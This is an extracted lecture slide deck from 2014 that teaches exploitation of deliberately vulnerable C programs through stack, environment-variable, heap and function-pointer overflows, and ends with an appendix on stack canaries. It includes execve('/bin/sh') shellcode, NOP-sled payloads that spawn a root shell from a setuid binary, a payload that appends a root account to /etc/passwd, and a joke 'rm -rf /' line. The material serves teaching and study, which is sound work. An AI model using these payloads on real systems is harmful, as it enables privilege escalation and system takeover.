Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege...

65
Overflows Sep 25, 2014 Hyuckmin Kwon 1

Transcript of Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege...

Page 1: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

1

OverflowsSep 25, 2014

Hyuckmin Kwon

Page 2: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

2

Contents

• Boot Camp• Buffer Overflow• Taking the Privilege• Using the ENVVAR• Heap Overflow• Function Pointer Overflow

Page 3: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

3

Boot Camp

Page 4: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

4

Before we start

• Stack Frame• Assembly(Intel x86)• CALL func

• PUSH EIP• JMP func

• LEAVE• MOV ESP, EBP• POP EBP

• RET• POP EIP• JMP EIP

ESP

EBP

Local variable n

Local variable 1

Saved Frame(Base) Pointer

Return address

Argument n

Argument 1

….(Previous stack frame)

0x00000000

0xffffffff

Page 5: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

5

Before we start

• We can also represent the stack frame like this

buffer1 buffer2 SFP RET arg n … arg 1

ESP EBP

Page 6: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

6

Buffer Overflow

Page 7: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

7

overflow_example.c

• Stack frame

• We can represent this function’s stack

int main(int argc, char *argv[]) { int value = 5; char buffer_one[8], buffer_two[8];

strcpy(buffer_one, "one"); /* put "one" into buffer_one */ strcpy(buffer_two, "two"); /* put "two" into buffer_two */ … printf("\n[STRCPY] copying %d bytes into buffer_two\n\n", strlen(argv[1])); strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */ …}

buffer_two[8] buffer_one[8] SFP RET arg n … arg 1

ESP EBP

Page 8: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

8

overflow_example.c

• What if the input’s length > sizeof(buffer_two)?

buffer_two[8] buffer_one[8] value SFP RET arg n … arg 1

$./overflow_example 1234567890123[BEFORE] buffer_two is at 0xbffff830 and contains 'two'[BEFORE] buffer_one is at 0xbffff838 and contains 'one'[BEFORE] value is at 0xbffff844 and is 5 (0x00000005)

[STRCPY] copying 13 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff830 and contains '1234567890123'[AFTER] buffer_one is at 0xbffff838 and contains '90123'[AFTER] value is at 0xbffff844 and is 5 (0x00000005)

buffer_two[8] buffer_one[8] value SFP RET arg n … arg 1

Page 9: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

9

auth_overflow.c

• Stack frame, againint check_authentication(char *password) { int auth_flag = 0; char password_buffer[16];

strcpy(password_buffer, password);

if(strcmp(password_buffer, "brillig") == 0) auth_flag = 1; if(strcmp(password_buffer, "outgrabe") == 0) auth_flag = 1;

return auth_flag;}

password_buffer[16] auth_flag SFP RET arg n … arg 1

ESP EBP

Just change the location of two variables

Page 10: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

10

auth_overflow2.c

• Q. Really it is enough?

auth_flag password_buffer[16] SFP RET arg n … arg 1

ESP EBP

auth_flag password_buffer[16] SFP RET arg n … arg 1

Will be the EIP’s valueafter the function is ended

It still can overwrite the return address!=It can manipulate the EIP

Page 11: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

11

auth_overflow2.c

• Manipulate the EIP(RET)• How many bytes are needed? maybe• auth_overflow

• 16Bytes(password_buffer) + 4Bytes(auth_flag) + 4Bytes(SFP)• auth_overflow2

• 16Bytes(password_buffer) + 4Bytes(SFP)• After (24, 20) Bytes, we can manipulate the RET

• Is it right?

• Let’s demonstrate it

Page 12: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

12

auth_overflow2.c

• We can manipulate the EIP• Then, where should we go?

int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <password>\n", argv[0]); exit(0); } if(check_authentication(argv[1])) { printf("\n-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); printf(" Access Granted.\n"); printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-\n"); } else { printf("\nAccess Denied.\n"); }}

Anyway,Access granted

Page 13: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

13

auth_overflow2.c

• Using perl• perl –e ‘print “A”x20’• perl –e ‘print “\x41”x20’• ./auth_overflow2 `perl –e ‘print “A”x20’`

Page 14: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

14

auth_overflow2.c

• Our payload• In computer security, payload refers to the part of mal-

ware which performs a malicious action (Wikipedia)

$ ./auth_overflow2 `perl –e 'print "A"x24, "AAAA", "\xbf\x84\x04\x08"'`

password_buffer

SFP

RET

Page 15: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

15

Taking the Privilege

Page 16: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

16

notesearch.c

• Permission

• What does the "s" mean?• setuid bit - Unix access rights flags that allow users to

run an executable with the permissions of the exe-cutable's owner or group (Wikipedia)• Therefore, we are the root only when executing note-

search

$ ls -l notesearch-rwsr-sr-x 1 root root 9169 2014-09-24 20:09 note-search

Page 17: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

17

notesearch.c

• Main functionint main(int argc, char *argv[]) {

int userid, printing=1, fd; // file descriptorchar searchstring[100];

if(argc > 1) strcpy(searchstring, argv[1]);

elsesearchstring[0] = 0;

userid = getuid();fd = open(FILENAME, O_RDONLY);if(fd == -1)

fatal("in main() while opening file for read-ing");

while(printing)printing = print_notes(fd, userid, search-

string);printf("-------[ end of note data ]-------\n");close(fd);

}

Page 18: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

18

notesearch.c

• Setuid as a root is very dangerous• What if we can get a shell as a root?

# rm –rf /The end of the world

Page 19: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

19

_Shellcode

• Curriculum accelation• Shellcode – A small piece of code used as the payload in

the exploitation of a software vulnerability (Wikipedia)

• This shellcode opens a shell prompt• If we can return to the shellcode, then…

• (We won’t cover how to make a shellcode at this time)

/* execve("/bin/sh") shellcode(35 Bytes) */char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80";

Page 20: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

20

notesearch.c

• Thinking about the payload• How to overflow it?

• Fill the stack frame, fill the SFP, and manipulate RET

• Q. Then, where is our malicious code?

Stack frame[0x98] SFP[4] RET[4]

ESP EBP

Page 21: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

21

notesearch.c

• We can put the shellcode in the stack frame!• And point the RET to the start of the shellcode

• But the shellcode is too short to fill the stack frame..

Stack frame[0x98] SFP[4] RET[4]

ESP EBP

Shellcode + etc. = 0x98Bytes 4bytes Address of the Shellcode

RET must point the start of the shellcode!

Page 22: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

22

notesearch.c

• NOP sled

nop nop nopnop nop nopnopnopnopnopnopnopnopnopnopnopnopnopnopnop nopnopnopnopnopnopnopnopnopnopnopnopnopnop nop nop nop nop nopnopnopnopnopnopnopnopnopnopnopnopnopnop

Sandy Claws

Page 23: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

23

notesearch.c

• NOP sled• NOP – No OPeration

• Do nothing. Just consume a CPU cycle• NOP in x86 assembly – 0x90 (1Byte instruction)

• It does not matter how many NOPs are executed

Page 24: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

24

notesearch.c

• Payload again

Shellcode + etc. = 152Bytes 4bytes Address of the Shellcode

RET must point to the start of the shellcode!

Shellcode with NOPs = 152Bytes(nopnopnop…

shellcode..nopnop…)4bytes Address of the

Shellcode

Pointing the middle of NOP sled is enough

Page 25: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

25

notesearch.c

• Finishing blow

• Let's demonstrate it

$ ./notesearch `perl -e 'print "\x90"x72, "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80","\x90"x29,[RET]x20'`

Page 26: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

26

Using the ENVVAR

Page 27: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

27

short_buffer.c

• Everyone knows where is the vulnerable part

#include <string.h>#include <stdio.h>

int main(int argc, char* argv[]) { char buffer[20]; strcpy(buffer, argv[1]); return 0;}

But there is no room for SHELLCODE

Page 28: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

28

short_buffer.c

• Environment variable• A set of dynamic named values that can affect the way

running processes will behave on a computer (Wikipedia)

• Let’s look at the environment variables$ envTERM=xterm-256colorSHELL=/bin/bashSSH_CLIENT=192.168.56.1 52260 22SSH_TTY=/dev/pts/1USER=ch4mchiLS_COLORS=MAIL=/var/mail/ch4mchiPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPWD=/home/ch4mchi…

Page 29: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

29

short_buffer.c

• How to make our own envvar?• export [name]=[value]

• Environment variables' location?• We can see them by gdb

• x/100s $ebp

$ export YELLOW=SUBMARINE$ envTERM=xterm-256colorSHELL=/bin/bashYELLOW=SUBMARINE…

Page 30: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

30

short_buffer.c

• Environment variables are stored at the end of the stack segment• Then, how about the shellcode?

Page 31: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

31

short_buffer.c

• Export the shellcode

$ export NECKSLICE=`perl -e 'print "\x90"x100, "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"'`$ env…PWD=/home/ch4mchiLANG=en_US.UTF-8NECKSLICE=����������������������������������������������������������������������������������������������������1�1�1ə��j XQh//shh/bin��Q��S��…

Page 32: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

32

short_buffer.c

• All we have to do is make RET point the shellcode• In the set of environment variable

Anything for filling stack frame SFP RET … NECKSLICE

Page 33: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

33

short_buffer.c

• Where is the NECKSLICE?/* getenvaddr.c */int main(int argc, char *argv[]) { char *ptr;

if(argc < 3) { printf("Usage: %s <envvar> <target program name>\n", argv[0]); exit(0); } ptr = getenv(argv[1]); /* get env var location */ /* adjust for program name */ ptr += (strlen(argv[0]) - strlen(argv[2]))*2; printf("%s will be at %p\n", argv[1], ptr);}

Page 34: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

34

short_buffer.c

• Payload

• Let's demonstrate it

$ ./short_buffer `perl –e 'print "A"x40, "AAAA", [ret]'`

Page 35: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

35

Heap Overflow

Page 36: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

36

notetaker.c

• Heap also can be overflowed

• First, we need to find each heap's address

int main(int argc, char *argv[]) { int userid, fd; // file descriptor char *buffer, *datafile;

buffer = (char *) ec_malloc(100); datafile = (char *) ec_malloc(20); strcpy(datafile, "/var/notes");

if(argc < 2) usage(argv[0], datafile);

strcpy(buffer, argv[1]);

printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer);

Page 37: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

37

notetaker.c

• Overflow the buffer

• Because of the glibc's checking, heap overflow has a limit in this time

$ ./notetaker `perl -e 'print "A"x104,"BBBB"'`[DEBUG] buffer @ 0x804a008: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'[DEBUG] datafile @ 0x804a070: 'BBBB'[DEBUG] file descriptor is 3Note has been saved.*** glibc detected *** ./booksrc/notetaker: free(): invalid next size (normal): 0x0804a008 ***======= Backtrace: =========/lib/tls/i686/cmov/libc.so.6[0xb7f017cd]

Page 38: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

38

notetaker.c

• Strategy• buffer – content of the note• datafile – filename of the note• notetaker – SUID(as root)ed binary• Memory map

buffer[100] …………………. datafile[20]

104Bytes

Page 39: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

39

notetaker.c

• /etc/passwd: Stores information of each user

$ cat /etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/sh…

Page 40: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

40

notetaker.c

• Idea – Overwrite the /etc/passwd• Because the open() in the notetaker contains

O_APPEND, we can append an arbitrary account

• XXq2wKiyI43A2• crypt("password", "XX");

hiroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

Name

PW

ID(0 means root)

Group

Login shell

Home dir

Page 41: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

41

notetaker.c

• Problem – the input should be ended with "/etc/passwd"

• Finally, we can add the new account

myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

$ mkdir /tmp/etc$ ln -s /bin/bash /tmp/etc/passwd$ ls -l /tmp/etc/passwdlrwxrwxrwx 1 ch4mchi ch4mchi /tmp/etc/passwd -> /bin/bash

hiroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

Page 42: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

42

notetaker.c

• Payload$ ./notetaker `perl -e 'print "hiroot:XXq2wKiyI43A2:0:0:", "A"x68,":/root:/tmp/etc/passwd"For fitting

the buffer distance

Page 43: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

43

Function Pointer Overflow

Page 44: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

44

game_of_chance.c

• A structure in the source

• Function pointer performs like RET

struct user { int uid; int credits; int highscore; char name[100]; int (*current_game) ();};

Page 45: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

45

game_of_chance.c

• Dealing with struct user

void input_name() { char *name_ptr, input_char='\n'; while(input_char == '\n') // Flush any leftover scanf("%c", &input_char); // newline chars.

// name_ptr = player name's address name_ptr = (char *) &(player.name);

while(input_char != '\n') { *name_ptr = input_char; scanf("%c", &input_char); name_ptr++; } *name_ptr = 0; // Terminate the string.}

Page 46: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

46

game_of_chance.c

• We have to preserve the last_gameif((choice < 1) || (choice > 7)) printf("\n[!!] The number %d is an invalid selection.\n\n", choice);else if (choice < 4) { // Othewise, choice was a game of some sort. if(choice != last_game) { // If the function ptr isn't set if(choice == 1) // then point it at the selected game player.current_game = pick_a_number; else if(choice == 2) player.current_game = dealer_no_match; else player.current_game = find_the_ace; last_game = choice; // and set last_game. } play_the_game(); // Play the game.}

Page 47: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

47

game_of_chance.c

• Find the profit function$ nm game_of_chance…08048d70 T jackpot…

Page 48: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

48

game_of_chance.c

• Payload• Like a macro

• It will change the current_game function pointer points to jackpot()

$ perl -e 'print "1\n5\nn\n5\n","A"x100,"\x70\x8d\x04\x08\n","1\nn\n","7\n"' | ./game_of_chance

$ perl -e 'print "1\n5\nn\n5\n","A"x100,"\x70\x8d\x04\x08\n","1\n","y\n"x10,"n\n7\n' | ./game_of_chance

Page 49: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

49

Thank You for lis-tening

Page 50: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

50

Appendix(Stack protector)

Page 51: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

51

Stack protector

• classic.c

#include <string.h>

int main(int argc, char* argv[]) { int deadbeef = 0xDEADBEEF; int deadcafe = 0xDEADCAFE; char hibari[16];

strcpy(hibari, argv[1]); return 0;}

Page 52: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

52

Stack protector

• Without canary$ gcc classic.c –o classic_fno_stack_protector –fno-stack-protec-tor(gdb) disass main 0x0804841d <+0> : push ebp 0x0804841e <+1> : mov ebp,esp 0x08048420 <+3> : and esp,0xfffffff0 0x08048423 <+6> : sub esp,0x30 0x08048426 <+9> : mov DWORD PTR [esp+0x2c],0xdeadbeef 0x0804842e <+17>: mov DWORD PTR [esp+0x28],0xdeadcafe 0x08048436 <+25>: mov eax,DWORD PTR [ebp+0xc] 0x08048439 <+28>: add eax,0x4 0x0804843c <+31>: mov eax,DWORD PTR [eax] 0x0804843e <+33>: mov DWORD PTR [esp+0x4],eax 0x08048442 <+37>: lea eax,[esp+0x18] 0x08048446 <+41>: mov DWORD PTR [esp],eax 0x08048449 <+44>: call 0x80482f0 <strcpy@plt> 0x0804844e <+49>: mov eax,0x0 0x08048453 <+54>: leave 0x08048454 <+55>: ret

Page 53: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

53

Stack protector

• Without canary – Stack frame(gdb) x/16x $esp0xbffff670: 0xbffff688 0xbffff89c 0x0804a000 0x080484b20xbffff680: 0x00000002 0xbffff744 0x61616161 0x626262620xbffff690: 0x63636363 0x64646464 0xdeadcafe 0xdead-beef0xbffff6a0: 0x08048460 0x00000000 0x00000000 0xb7e3fa83

RET

SFP

deadbeef

deadcafe

hibari[12:15]

hibari[8:11]

hibari[4:7]

hibari[0:3]

EBP

ESP

Page 54: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

54

Stack protector

• fstack-protector – Step 1. write a canary$ gcc classic.c –o classic_fstack_protector –fstack-protector(gdb) disass main 0x0804846d <+0> : push ebp 0x0804846e <+1> : mov ebp,esp 0x08048470 <+3> : and esp,0xfffffff0 0x08048473 <+6> : sub esp,0x30 0x08048476 <+9> : mov eax,DWORD PTR [ebp+0xc] 0x08048479 <+12>: mov DWORD PTR [esp+0xc],eax 0x0804847d <+16>: mov eax,gs:0x14 0x08048483 <+22>: mov DWORD PTR [esp+0x2c],eax 0x08048487 <+26>: xor eax,eax 0x08048489 <+28>: mov DWORD PTR [esp+0x14],0xdeadbeef 0x08048491 <+36>: mov DWORD PTR [esp+0x18],0xdeadcafe 0x08048499 <+44>: mov eax,DWORD PTR [esp+0xc] 0x0804849d <+48>: add eax,0x4 0x080484a0 <+51>: mov eax,DWORD PTR [eax] 0x080484a2 <+53>: mov DWORD PTR [esp+0x4],eax 0x080484a6 <+57>: lea eax,[esp+0x1c] 0x080484aa <+61>: mov DWORD PTR [esp],eax 0x080484ad <+64>: call 0x8048340 <strcpy@plt>

Page 55: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

55

Stack protector

• fstack-protector

• Step 2. Check the canary remains same

$ gcc classic.c –o classic_fstack_protector –fstack-protector(gdb) disass main 0x080484b2 <+69>: mov eax,0x0 0x080484b7 <+74>: mov edx,DWORD PTR [esp+0x2c] 0x080484bb <+78>: xor edx,DWORD PTR gs:0x14 0x080484c2 <+85>: je 0x80484c9 <main+92> 0x080484c4 <+87>: call 0x8048330 <__stack_chk_fail@plt> 0x080484c9 <+92>: leave 0x080484ca <+93>: ret

Page 56: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

56

Stack protector

• fstack-protector – Stack frame(gdb) x/16x $esp0xbffff670: 0xbffff68c 0xbffff8a0 0x0804a000 0xbffff7440xbffff680: 0x00000002 0xdeadbeef 0xdeadcafe 0x616161610xbffff690: 0x62626262 0x63636363 0x00646464 0x9af7b4000xbffff6a0: 0x080484d0 0x00000000 0x00000000 0xb7e3fa83

RET

SFP

CANARY

hibari[12:15]

hibari[8:11]

hibari[4:7]

hibari[0:3]

deadcafe

deadbeef

EBP

ESP

Page 57: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

57

Stack protector

• fstack-protector-all

• Step 2. Same

$ gcc classic.c –o classic_fstack_protector_all –fstack-protec-tor-all(gdb) disass main 0x0804846d <+0>: push ebp 0x0804846e <+1>: mov ebp,esp 0x08048470 <+3>: and esp,0xfffffff0 0x08048473 <+6>: sub esp,0x30 0x08048476 <+9>: mov eax,DWORD PTR [ebp+0x8] 0x08048479 <+12>: mov DWORD PTR [esp+0xc],eax 0x0804847d <+16>: mov eax,DWORD PTR [ebp+0xc] 0x08048480 <+19>: mov DWORD PTR [esp+0x8],eax 0x08048484 <+23>: mov eax,gs:0x14 0x0804848a <+29>: mov DWORD PTR [esp+0x2c],eax 0x0804848e <+33>: xor eax,eax 0x08048490 <+35>: mov DWORD PTR [esp+0x14],0xdeadbeef 0x08048498 <+43>: mov DWORD PTR [esp+0x18],0xdeadcafe

Page 58: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

58

Stack protector

• fstack-protector-all – Step 1. Almost same$ gcc classic.c –o classic_fstack_protector_all –fstack-protec-tor-all(gdb) disass main 0x080484a0 <+51>: mov eax,DWORD PTR [esp+0x8] 0x080484a4 <+55>: add eax,0x4 0x080484a7 <+58>: mov eax,DWORD PTR [eax] 0x080484a9 <+60>: mov DWORD PTR [esp+0x4],eax 0x080484ad <+64>: lea eax,[esp+0x1c] 0x080484b1 <+68>: mov DWORD PTR [esp],eax 0x080484b4 <+71>: call 0x8048340 <strcpy@plt> 0x080484b9 <+76>: mov eax,0x0 0x080484be <+81>: mov edx,DWORD PTR [esp+0x2c] 0x080484c2 <+85>: xor edx,DWORD PTR gs:0x14 0x080484c9 <+92>: je 0x80484d0 <main+99> 0x080484cb <+94>: call 0x8048330 <__stack_chk_fail@plt> 0x080484d0 <+99>: leave 0x080484d1 <+100>: ret

Page 59: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

59

Stack protector

• fstack-protector

• Step 2. Check the canary remains same

$ gcc classic.c –o classic_fstack_protector –fstack-protector(gdb) disass main 0x080484b2 <+69>: mov eax,0x0 0x080484b7 <+74>: mov edx,DWORD PTR [esp+0x2c] 0x080484bb <+78>: xor edx,DWORD PTR gs:0x14 0x080484c2 <+85>: je 0x80484c9 <main+92> 0x080484c4 <+87>: call 0x8048330 <__stack_chk_fail@plt> 0x080484c9 <+92>: leave 0x080484ca <+93>: ret

Page 60: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

60

Stack protector

• fstack-protector• If we try to overflow the stack$ ./classic_fstack_protector aaaaaaaaaaaaaaaaaaaaaaaaaaaa

*** stack smashing detected ***: ./classic_fstack_protector ter-minated/* canary will be dead */

Page 61: Overflows Sep 25, 2014 Hyuckmin Kwon 1. Contents Boot Camp Buffer Overflow Taking the Privilege Using the ENVVAR Heap Overflow Function Pointer Overflow.

61

Stack protector

• fstack-protector-all – Stack frame(gdb) x/16x $esp0xbffff670: 0xbffff68c 0xbffff89c 0xbffff744 0x000000020xbffff680: 0x00000002 0xdeadbeef 0xdeadcafe 0x616161610xbffff690: 0x62626262 0x63636363 0x00646464 0x3f0e3a000xbffff6a0: 0x080484e0 0x00000000 0x00000000 0xb7e3fa83

RET

SFP

CANARY

